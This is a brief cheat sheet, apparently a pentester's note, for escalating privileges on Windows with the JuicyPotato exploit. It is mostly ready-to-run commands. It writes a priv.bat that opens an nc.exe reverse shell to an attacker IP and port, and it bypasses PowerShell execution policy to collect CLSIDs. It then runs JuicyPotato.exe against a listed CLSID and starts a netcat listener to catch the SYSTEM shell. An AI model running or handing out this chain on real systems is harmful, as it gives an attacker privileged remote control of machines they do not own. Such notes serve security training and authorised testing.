Juicypotato

Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled through

whoami /priv or whoami /all

Requirement
- Potato exe https://github.com/ohpe/juicy-potato/releases
  Note: there other exe also other than juicypotato like rotten potato, sweet potato, etc which can be used under certain circumstances
  https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Create priv.bat foe reverse privilege shell
  
  echo “C:\Windows\Tasks\nc.exe -e cmd.exe <attacker ip> <port>” > priv.bat
- transfer nc.exe /usr/share/windows-resources/binaries/nc.exe
- script GetCLSID.ps1 for finding CLSID https://ohpe.it/juicy-potato/CLSID/
  
  powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt
  Sometime CLSID is not required
Transfer all file on window host

Exploit
- .\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t * -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E}
  
  -l for listening port same as in priv.bat , -c for clsid
- nc -nvlp 4444

Reference
https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato